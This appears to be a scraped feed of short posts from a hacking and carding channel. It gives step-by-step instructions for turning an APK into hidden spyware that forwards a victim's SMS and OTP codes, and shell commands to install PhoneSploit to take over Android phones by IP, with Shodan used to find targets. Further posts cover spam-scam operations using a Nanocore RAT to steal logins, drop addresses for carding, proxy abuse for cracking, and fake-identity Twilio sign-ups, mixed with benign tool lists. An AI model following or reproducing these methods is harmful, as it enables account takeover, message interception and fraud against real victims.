🌀SHODAN :- Shodan is the world’s first search engine for Internet-connected devices. … Use Shodan to discover which of your devices are connected to the Internet,




🌀Website Vulnerability Scanner :- The Web Vulnerability Scanner finds website vulnerabilities like SQLi, XSS, server misconfiguration and many more. Use our Website Scanner to check your web security.




🌀Hack This Site :- HackThisSite! is a legal and safe network security resource where users test their hacking skills on various challenges and learn about hacking and network security. Also provided are articles, comprehensive and active forums, and guides and tutorials. Learn how to hack!


Enjoy! Follow us for more...

Tutorial for IPVanish Proxies


If you are new to cracking or even quite well versed with the working, you must have come across the talk ofIPVanish Proxies. They are quite good public proxies that can be utilised for several tasks. Please follow the steps below to generate the proxies for your use:


Prerequisites: 


1. IPVanish Premium Account                

2. List of Proxy Locations                        

3. A checker that can utilise

Username:Password Proxies


Method:


1. Log into the IPVanish Premium Account and head over to the Socks5 Proxy Tab.

2. Locate the Username and Password. Copy them and save in the format Username:Password somewhere

3. Download the text file : 

https://www.upload.ee/files/12641826/IPVanish.txt.html

4. Select the username:password in the text file and click on Replace option as shown in the screenshot

5. Paste the earlier copied Username:Password into the Replace With box and click on Replace All. 

6. Save the file and you have working Fairly HQ Socks5 Proxies ready to use for your task


Enjoy! Follow us for more...

How To Get a Confirmed USA Address / Drop

 🔰🔰


Topic: Shipito

URL:https://www.shipito.com/en/


Shipito which simply means ship it out is an application or a site that manages a warehouse or drop 

So if u sign up on Shipito u would be given a USA address which is obviously a warehouse where u can shop ur goods to

On Shipito payment is done through bitcoin and wire transfer

The Shipito address can be used on all shopping sites

So I have created new job for the smart ones don't beg me for money you can sell the paid address for $10 upwards to people looking at address for carding

U can also track ur package when they are sent by shipito . Shipito is powered by amazon

Make sure u use USA Numbers to contact them.


Enjoy! Follow us for more...

HOW TO HACK WHATSAPP OTP

 

Ⓜ️ ʜᴇʟʟᴏ, ɢᴜʏ's ɪ ᴀᴍ ʙᴀᴄᴋ ᴡɪᴛʜ ᴀɴᴏᴛʜᴇʀ ᴀᴍᴀᴢɪɴɢ ᴘᴏsᴛ sᴏ ᴛᴏᴅᴀʏ ɪɴ ᴛʜɪs ᴘᴏsᴛ ᴡᴇ ɢᴇᴛ ᴛᴏ ᴋɴᴏᴡ ᴀʙᴏᴜᴛ ʜᴏᴡ ᴛᴏ ʜᴀᴄᴋ sᴍs ᴏʀ ᴏᴛᴘ ғʀᴏᴍ ᴀ sɪᴍᴘʟᴇ ᴀᴘᴘ, ᴀɴᴅ ғʀᴏᴍ ᴛʜɪs ʏᴏᴜ ᴄᴀɴ ᴇᴀsɪʟʏ ғᴏʀᴡᴀʀᴅ ʏᴏᴜʀ ᴠɪᴄᴛɪᴍ ᴍᴇssᴀɢᴇs ᴛᴏ ʏᴏᴜʀ ᴅᴇᴠɪᴄᴇ ᴡɪᴛʜᴏᴜᴛ ᴀɴʏ ɪssᴜᴇ. sᴏ ᴛᴏ ᴅᴏ ᴛʜᴀᴛ ᴡᴇ ɴᴇᴇᴅ ᴛᴏ ᴅᴏ sᴏᴍᴇ ᴄʜᴀɴɢᴇs ɪɴ ᴛʜᴀᴛ ᴀᴘᴋ sᴏ ɢᴜʏ's ʟᴇᴛs ɢʀᴏ ᴛʜʀᴏᴜɢʜ ᴘʀᴀᴄᴛɪᴄᴀʟ sᴛᴇᴘs ɴᴏᴡ.


🌀ғᴏʟʟᴏᴡ ʙᴇʟᴏᴡ sᴛᴇᴘ's


♻️1. ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅ ɪɴsᴛᴀʟʟ ᴀᴘᴋ ᴇᴅɪᴛᴏʀ ᴘʀᴏ : (ᴄʟɪᴄᴋ ʜᴇʀᴇ) 


♻️2. ᴅᴏᴡɴʟᴏᴀᴅ ғʙ ᴄᴏʟᴏᴜʀ ᴀᴘᴋ (ᴄʟɪᴄᴋ ʜᴇʀᴇ)


✅ sᴛᴇᴘ 1


●> ᴍᴏᴠᴇ ғʙ ᴄᴏʟᴏʀ ᴀᴘᴋ ᴛᴏ ʏᴏᴜʀ ɪɴᴛᴇʀɴᴀʟ sᴛᴏʀᴀɢᴇ ᴏғ ᴛʜᴇ ᴅᴇᴠɪᴄᴇ


●> ᴏᴘᴇɴ ᴀᴘᴋ ᴇᴅɪᴛᴏʀ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ sᴇʟᴇᴄᴛ ᴀɴ ᴀᴘᴋ ғɪʟᴇ ᴀɴᴅ ɴᴏᴡ ʏᴏᴜʀ ɪɴᴛᴇʀɴᴀʟ sᴛᴏʀᴀɢᴇ ᴏᴘᴇɴs ʜᴇʀᴇ ɪɴ ʏᴏᴜʀ ɪɴᴛᴇʀɴᴀʟ sᴛᴏʀᴀɢᴇ sᴇʟᴇᴄᴛ ғʙ ᴄᴏʟᴏʀ ᴀᴘᴋ ᴡʜɪᴄʜ ʏᴏᴜ ʀᴇᴄᴇɴᴛʟʏ ᴍᴏᴠᴇᴅ ᴛᴏ ʏᴏᴜʀ ɪɴᴛᴇʀɴᴀʟ sᴛᴏʀᴀɢᴇ. ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴀᴛ ᴀᴘᴋ ᴀɴᴅ ᴛʜᴇɴ ᴄʟɪᴄᴋ ᴏɴ ғᴜʟʟ ᴇᴅɪᴛ (ʀᴇsᴏᴜʀᴄᴇ- ʀᴇʙᴜɪʟᴅ) ᴀɴᴅ ᴛʜᴇɴ ᴄʟɪᴄᴋ ᴏɴ ᴀʟʟ ғɪʟᴇs ᴛʜᴇ ᴀᴘᴋ ғɪʟᴇs ᴡɪʟʟ ʙᴇ ᴏᴘᴇɴᴇᴅ ɪɴ ᴀᴘᴋ ᴇᴅɪᴛᴏʀ.


●> ɴᴏᴡ ᴄʟɪᴄᴋ ᴏɴ ғɪʟᴇs ᴀɴᴅ ᴄʟɪᴄᴋ sᴍᴀʟɪ ʙᴜᴛᴛᴏɴ ɪɴ ᴛʜᴀᴛ ᴡɪɴᴅᴏᴡ ᴀɴᴅ ᴡᴀɪᴛ ғᴏʀ 10 sᴇᴄᴏɴᴅs ᴛʜᴇ sᴍᴀʟɪ ғᴏʟᴅᴇʀ ᴡɪʟʟ ʙᴇ sʜᴏᴡɴ ɪɴ ʙᴇᴛᴡᴇᴇɴ ғᴏʟᴅᴇʀs ɪɴ ᴛʜᴀᴛ sᴀᴍᴇ ᴡɪɴᴅᴏᴡ. ɴᴏᴡ ᴡʜᴇɴ ᴛʜᴇ sᴍᴀʟɪ ғᴏʟᴅᴇʀ ɪs ᴠɪsɪʙʟᴇ ᴄʟɪᴄᴋ ᴏɴ ɪᴛ ᴀɴᴅ ɢᴇᴛ ɪɴsɪᴅᴇ ᴛʜᴇ sᴍᴀʟɪ ғᴏʟᴅᴇʀ.


●> ɴᴏᴡ ᴀғᴛᴇʀ ᴇɴᴛᴇʀɪɴɢ ɪɴᴛᴏ sᴍᴀʟɪ ғᴏʟᴅᴇʀ ᴄʟɪᴄᴋ ᴏɴ ᴄᴏᴍ ᴀɴᴅ ɪɴsɪᴅᴇ ɪᴛ ᴀᴘᴋᴇᴅɪᴛᴏʀs ᴀɴᴅ ɪɴsɪᴅᴇ ɪᴛ ʜᴀᴄᴋɪɴɢᴛᴇʟᴇɢʀᴀᴍ ᴀɴᴅ ɪɴsɪᴅᴇ ᴛʜɪs ɪɴᴄᴏᴍɪɴɢsᴍs.sᴍᴀʟɪ. ɴᴏᴡ ᴄʟɪᴄᴋ ᴏɴ ᴛʜɪs ᴏɴᴇ ᴀɴᴅ ᴀɴ ᴇᴅɪᴛᴏʀ ᴡɪʟʟ ʙᴇ ᴏᴘᴇɴᴇᴅ ᴀɴᴅ ɪɴsɪᴅᴇ ᴛʜᴀᴛ ᴜsᴇ sᴇᴀʀᴄʜ ɪᴄᴏɴ ᴛᴏ sᴇᴀʀᴄʜ ᴛʜɪs 0915000. ɴᴏᴡ ᴡʜᴇɴ ʏᴏᴜ ɢᴇᴛ ᴛʜɪs ʟɪɴᴇ ᴊᴜsᴛ ʀᴇᴍᴏᴠᴇ ᴛʜɪs ɴᴜᴍʙᴇʀ ᴀɴᴅ ᴘᴜᴛ ʏᴏᴜʀ ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀ ᴡɪᴛʜ ʏᴏᴜʀ ᴄᴏᴜɴᴛʀʏ ᴄᴏᴅᴇ (+91*****) ɪɴ ᴡʜɪᴄʜ ʏᴏᴜ ᴡᴀɴᴛ ᴛᴏ ʀᴇᴄᴇɪᴠᴇ ᴠɪᴄᴛɪᴍ ᴍᴇssᴀɢᴇs ᴏᴛᴘ ᴇᴛᴄ... sᴏ ᴀғᴛᴇʀ ʀᴇᴘʟᴀᴄɪɴɢ ᴄʜᴇᴄᴋ ɪᴛ ᴏɴᴄᴇ ᴀɢᴀɪɴ. ᴡʜᴇɴ ʏᴏᴜ ғᴇᴇʟ ᴀʟʟ ᴛʜɪɴɢs ᴀʀᴇ ɢᴏᴏᴅ ɴᴏᴡ ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ sᴀᴠᴇ ʙᴜᴛᴛᴏɴ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ʙᴜɪʟᴅ. sᴏ ᴀғᴛᴇʀ 2 ᴍɪɴᴜᴛᴇs ᴛʜᴇ ᴀᴘᴘ ᴡɪʟʟ ʙᴇ ʙᴜɪʟᴛ ᴀɴᴅ sɪɢɴᴇᴅ ᴡɪᴛʜ ᴛʜᴇ ᴋᴇʏ, sᴏ ᴛᴏ ɢᴇᴛ ᴛʜᴀᴛ ᴀᴘᴘ. ᴏᴘᴇɴ ʏᴏᴜʀ ғɪʟᴇ ᴍᴀɴᴀɢᴇʀ ᴀɴᴅ ɢᴏ ᴛᴏ ɪɴᴛᴇʀɴᴀʟ sᴛᴏʀᴀɢᴇ ᴀɴᴅ ᴄʜᴇᴋ ᴀᴘᴋᴇᴅɪᴛᴏʀ ғᴏʟᴅᴇʀ ᴀɴᴅ ᴄʟɪᴄᴋ ᴏɴ ɪᴛ ᴛʜᴇɴ ʏᴏᴜ ᴡɪʟʟ ɢᴇᴛ ᴛʜᴇ ᴀᴘᴘ ɴᴀᴍᴇᴅ ɢᴇɴ_sɪɢɴᴇᴅ.ᴀᴘᴋ sᴏᴍᴇᴛʜɪɴɢ ʟɪᴋᴇ ᴛʜɪs ɴᴏᴡ ʀᴇɴᴀᴍᴇ ɪᴛ ᴀɴᴅ sᴇɴᴅ ɪᴛ ᴛᴏ ʏᴏᴜʀ ᴛᴀʀɢᴇᴛ (ᴠɪᴄᴛɪᴍ) ᴡʜᴇɴ ʜᴇ ɪɴsᴛᴀʟʟs ɪᴛ ᴀɴᴅ ᴏᴘᴇɴs ᴛʜᴇ ᴀᴘᴘ ᴡɪʟʟ ʜɪᴅᴇ ᴀᴜᴛᴏᴍᴀᴛɪᴄᴀʟʟʏ. sᴏ ᴡʜᴇɴᴇᴠᴇʀ ʏᴏᴜʀ ᴠɪᴄᴛɪᴍ ʀᴇᴄᴇɪᴠᴇs ᴀɴʏ ᴏᴛᴘ ᴏʀ ᴍᴇssᴀɢᴇs ʏᴏᴜ ᴡɪʟʟ ɢᴇᴛ ᴛʜᴇᴍ ɪɴ ʏᴏᴜʀ ᴅᴇᴠɪᴄᴇ. sᴏ ᴛʜᴀᴛ's ᴀʟʟ ғᴏʀ ᴛᴏᴅᴀʏ sᴏ ɪ ʜᴏᴘᴇ ɢᴜʏs ʏᴏᴜ ʟɪᴋᴇᴅ ɪᴛ.



Enjoy! Follow us for more...

Dangerous Apps Which Can Land You In Jail

 

Note: Never try using these apps else you'll end up in jail or loosing all your important data!


1. SPOOF APP


Call spoofing is technology that can use someone's mobile number and call someone else.


If you use any spoof website or app, you will have to wind up the direct jail because the app is black-listed.


2. WIFIKILL


As the name says, this app is used to kill wifi. by using this android app, you can trun off other's Wifi networks.


3. POPCORN TIME


Here you can find latest movies as you want in HD quality.


This blacklisted app gets your ilP address trace, which claims you as a criminal according to the law.


4.BLACKMART


It is a replica of the play store. it is rstricted globally, but if you use it, you break the law.


5. TORRENT(personally I use it 😅) 


All of you know about this one. If you download something from there, you have to pay fine or jail of 3years.



Enjoy! Follow us for more...

TERMUX SMS


SEND SMS USING TERMUX APP.


$ apt update


$ apt upgrade


$ apt install termux-api

message sending process 


$ termux-sms-send -n 9999999999 text

9999999999 = Receiver number

text = your message here


Enjoy! Follow us for more...

HOW TO SPAM Tutorial

 

FIRST RULE : MONEY ATTRACTS MONEY 🤝


Spamming require the use of much tools to bypass verification of alotta site firewalls, securities and passwords. 👌


So with that in mind you need to spend money to make money !!


Now we are good to get started :


NECESARRY TOOLS :


1 piece of RDP ✅ 

1 VPN ✅  

 SSH in order to have a fresh IP that is not blacklisted

(if you are a spammer don't be happy if your rdp lasts 1 month or 2 months because it will be blacklisted in few days 2-5 usually so it is worthless after that)


SMTP: the more smtp, the better ,(there is no such thing as unlimited ip smtp , domain smtp , mailer and so on ) spamming 1 million emails without at least 10-15  results  is wasting time ,and now I will explain you why because even if 1 smtp is showing that it is sending a huge number of emails they are added to a que where it can take even 2-3 weeks to reach the last email in the que, Why i say the more the better :in a ideal situation

where you have 1 mil emails and 10 smtps each smtp is supposed to send 100k (not many smtps send that much) the delivery time for qued emails is around 24-48 hours (enough time to get your email where you receive results closed or you scam hosting ).


LEADS/EMAILS not needed to say one of the most important parts of your spam success will be the emails , the better the leads the more results you will get


INFO ON SPAMMING(TIPS AND TRICKS) 


FIRST OFF ALL WHY YOU SPAM AND YOU DON'T GET RESULTS ???

BECAUSE YOU USE A SHITTY LETTER THAT YOU ARE USING FOR OVER 1 YEAR AND IF YOU GOOGLE PARTS OF IT YOU CAN FIND IT POSTED ON MOST OF SCAM BUSTING WEBSITES !!


IMPORTANT : the year is 2020 if you use 2011 or 2018 scam letters you are wasting money and your time, well you are too late... so first you have to change the content of the letter , keep the idea 💡 but wrap it in other words , change the sender, name and sender address , if you and your friend blasted 20 mil leads using the same sender name/ sender adress / letter be sure is blacklisted by all major email providers so most smtps will not deliver it the same ,if your ip(rdp,vpn,ssh) is blacklisted.

It is a work of writing your email content testing it for inbox , for delivery and editing again if you want results !!


UNLIMITED SENDING (SMTP,MAILER,WEBMAIL) : all smtps are hosted by different companies in the world they are either setup to have a daily limit , hourly limit , or are limited by the internet connection they have by that it means they will have a delay in relaying emails because of the internet speed they have , usually after sending few thousand emails they start delaying few hours!... So you drip your texts, once they log, you use your Nanocore link to bypass eceeyhing related to that email be it usernames and passwords, you can still use that Nanocore to hack Fb emails to get the codes and verification to log into an account, same as lovoo, Instagram, pof etc. Now Flex man🤝....


Enjoy! Follow us for more...

HOW TO CREATE UNLIMITED PHONE NUMBERS OF ANY COUNTRY


1⃣- ᴄᴏɴɴᴇᴄᴛ ʏᴏᴜʀ ᴠᴘɴ ᴛᴏ ᴛʜᴇ ᴜs ᴜᴜ.


2⃣- ᴏᴘᴇɴ ᴛʜᴇ ᴡᴇʙsɪᴛᴇ https://www.twilio.com/ ɪɴ ʏᴏᴜʀ ʙʀᴏᴡsᴇʀ.


3⃣- ᴄʟɪᴄᴋ ᴏɴ "ɢᴇᴛ ᴀ ғʀᴇᴇ ᴀᴘɪ ᴋᴇʏ".


4⃣- ʀᴇɢɪsᴛᴇʀ ᴜsɪɴɢ ғᴀʟsᴇ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ғʀᴏᴍ ᴛʜᴇ ᴜsᴀ. ᴜᴜ.

ғʀᴏᴍ ʜᴇʀᴇ ( https://www.fakenamegenerator.com/ )

ғᴏʀ ᴇᴍᴀɪʟ

ᴅᴏ ɴᴏᴛ ᴜsᴇ ᴛᴇᴍᴘᴍᴀɪʟ ᴜsᴇ @ ᴏᴜᴛʟᴏᴏᴋ.ᴄᴏᴍ , @ ɢᴍᴀɪʟ.ᴄᴏᴍ ,

@ ʜᴏᴛᴍᴀɪʟ.ᴄᴏᴍ , @ ʏᴀʜᴏᴏ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ 100% sᴜᴄᴄᴇss. (@ ᴏᴜᴛʟᴏᴏᴋ.ᴄᴏᴍ ʀᴇᴄᴏᴍᴍᴇɴᴅᴇᴅ)


5⃣- ᴄʜᴏᴏsᴇ "ᴊᴀᴠᴀ" ɪɴ ᴛʜᴇ ʟᴀɴɢᴜᴀɢᴇ.


6⃣- ɪɴ ᴛʜᴇ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ ᴏғ ᴛʜᴇ ᴍᴏʙɪʟᴇ ɴᴜᴍʙᴇʀ, ᴜsᴇ ᴛʜᴇ ᴠɪʀᴛᴜᴀʟ ᴛᴇxᴛɴᴏᴡ ɴᴜᴍʙᴇʀ ᴏʀ ᴜsᴇ ᴛʜᴇ sᴇᴄᴏɴᴅ ʟɪɴᴇ ғᴏʀ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ.


7⃣- ᴀғᴛᴇʀ ᴠᴇʀɪғɪᴄᴀᴛɪᴏɴ, ᴛʜᴇ ᴍᴇɴᴜ ᴏғ ʏᴏᴜʀ ᴘʀᴏᴊᴇᴄᴛ ᴡɪʟʟ ᴀᴘᴘᴇᴀʀ.


8⃣- ᴄʜᴏᴏsᴇ ᴛᴇᴍᴘʟᴀᴛᴇs -> ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀs.


9⃣- ɢɪᴠᴇ ᴀɴʏ ɴᴀᴍᴇ ᴛᴏ ʏᴏᴜʀ ᴘʀᴏᴊᴇᴄᴛ ᴀɴᴅ sᴋɪᴘ ᴏᴛʜᴇʀ sᴛᴇᴘs.


🔟- ᴏɴᴄᴇ ᴛʜᴇ ᴘʀᴏᴊᴇᴄᴛ ɪs ᴄʀᴇᴀᴛᴇᴅ, ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ ᴘʜᴏɴᴇ ɴᴜᴍʙᴇʀs.


1⃣1⃣- sᴇʟᴇᴄᴛ ᴛʜᴇ ᴄᴏᴜɴᴛʀʏ ᴀɴᴅ ᴛʜᴇɴ sᴇᴀʀᴄʜ.


1⃣2⃣- sᴇʟᴇᴄᴛ ᴀɴʏ ɴᴜᴍʙᴇʀ ᴏɴ ᴛʜᴇ sᴄʀᴇᴇɴ ᴀɴᴅ ᴄʟɪᴄᴋ "ʙᴜʏ" (ᴅᴏɴ'ᴛ ᴡᴏʀʀʏ, ᴛʜᴇʀᴇ ɪs ɴᴏ ᴘᴀʏᴍᴇɴᴛ ᴍᴇᴛʜᴏᴅ).


Enjoy! Follow us for more...

1⃣3⃣- ᴄʟɪᴄᴋ ᴏɴ ᴛʜᴇ ᴄᴏɴғɪɢᴜʀᴀᴛɪᴏɴ ɴᴜᴍʙᴇʀ.


1⃣4⃣- ᴅᴏɴᴇ, ᴊᴜsᴛ ᴄʀᴇᴀᴛᴇ ᴀ ᴠɪʀᴛᴜᴀʟ ɴᴜᴍʙᴇʀ ᴡɪᴛʜ ᴛʜᴇ ᴄᴀʟʟs, sᴍs, ᴍᴍs ғᴜɴᴄᴛɪᴏɴ.


1⃣5⃣- ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴀɴᴏᴛʜᴇʀ ɴᴜᴍʙᴇʀ, ʀᴇᴘᴇᴀᴛ ᴛʜᴇ ᴘʀᴇᴠɪᴏᴜs ɴᴜᴍʙᴇʀ ᴀɴᴅ ʙᴜʏ ᴀɴᴏᴛʜᴇʀ ɴᴜᴍʙᴇʀ.

How to Install Phonesploit in Termux without Root or without any error. You can exploit any android device by just IP Address

 *.*


pkg up -y


pkg install git -y


pkg install python -y


pkg install openssl-tool


pkg install wget -y


pip install colorama


git clone https://github.com/MasterDevX/Termux-ADB


cd Termux-ADB


chmod +x InstallTools.sh


bash InstallTools.sh


cd 


git clone https://github.com/01010000-kumar/PhoneSploit


cd PhoneSploit


python phonesploit.py


y



Enjoy! Follow us for more...

How to Hack Android by IP Using Termux | No Root Needed

🔥Is it possible ??


Yes , if the victime phone is vulnerable, "PhoneSploit" is a tool that allows you to exploit the vulnerability of phones with "USB debugging enabled " knowing only the IP address of the device itself.

If you have USB debugging enabled, then it will be enough for an attacker to have Termux installed and to know the IP address of your device to get hold of it.


🔥Guide Installation :-


First, we install everything necessary for the tool to work:


apt update && apt upgrade 


Now we install the tool using the commands:


git clone https://github.com/Zucccs/PhoneSploit 



🔥Uses of This Tools :-


To operate the tool, we will need to find out the IP address of the phone that we want to hack.


In addition, you can use Shodan.io to find vulnerable phones.



After obtaining the IP address of the phone, go to the repository with the tool:


cd PhoneSploit 


And run the tool with the command:


python2 main_linux.py 


Next, we agree that we have installed Termux-ADB and enter the IP address of the vulnerable phone.


If the connection was successful, then you will be able to enter various commands. To view the available functions, enter the command - help

Enjoy! Follow us for more...

What is Burp Suite? What are the tools does it contain?🛑

 

Burp Suite is an integrated platform used for attacking net applications. It contains all the tools a hacker would need for attacking any application. a number of these functionalities are


Proxy


Spider


Scanner


Intruder


Repeater


Decoder


Comparer


Sequencer



Type of sql injection Error-based SQL injection🛑


Blind SQL injection


Time-based SQL injection


Enjoy! Follow us for more...

What are the tools used for ethical hacking

 

There are several moral hacking tools out there within the marketing for different purposes, they are:


NMAP – NMAP stands for Network plotter. It’s associate degree open source tool that’s used wide for network discovery and security auditing.


Metasploit – Metasploit is one amongst the most powerful exploit tool to conduct basic penetration tests.


Burp Suit – Burp Suite could be a widespread platform that’s widely used for playing security testing of internet applications.


Angry IP Scanner – Angry information processing scanner could be a light-weight, cross-platform information processing address and port scanner.


Cain & Abel – Cain & Abel is a password recovery tool for Microsoft operational Systems.


Ettercap – Ettercap stands for local area network Capture. It is used for Man-in-the-Middle attack using a network security tool.



Enjoy! Follow us for more...

How to protect website been hacked


Using Firewall : Firewall may be accustomed drop traffic from suspicious information processing address if attack may be an easy DOS


Encrypting the Cookies : Cookie or Session poisoning may be prevented by encrypting the content of the cookies, associating cookies with the consumer information processing address and temporal arrangement out the cookies once it slow


Validating and confirmative user input : This approach is prepared to stop the type tempering by confirmative and verifying the user input before processing it


Header Sanitizing and validation : This technique is beneficial against cross website scripting or XSS, this method includes verifying and sanitizing headers, parameters passed via the address, type parameters and hidden values to cut back XSS attacks.


Enjoy! Follow us for more...

Best Web Crawling :



https://www.cyotek.com/cyotek-webcopy


http://www.octoparse.com/


https://www.httrack.com/


https://chrome.google.com/webstore/detail/scraper/mbigbapnjcgaffohmbkdlecaccepngjd


https://addons.mozilla.org/en-US/firefox/addon/outwit-hub/


http://visualscraper.blogspot.hk/


https://www.parsehub.com/


https://scrapinghub.com/


https://webhose.io/


https://dexi.io/


https://www.import.io/


https://www.spinn3r.com/


Enjoy! Follow us for more...

How to use a solderless breadboard.mp4

  Download now  Enjoy! Follow us for more...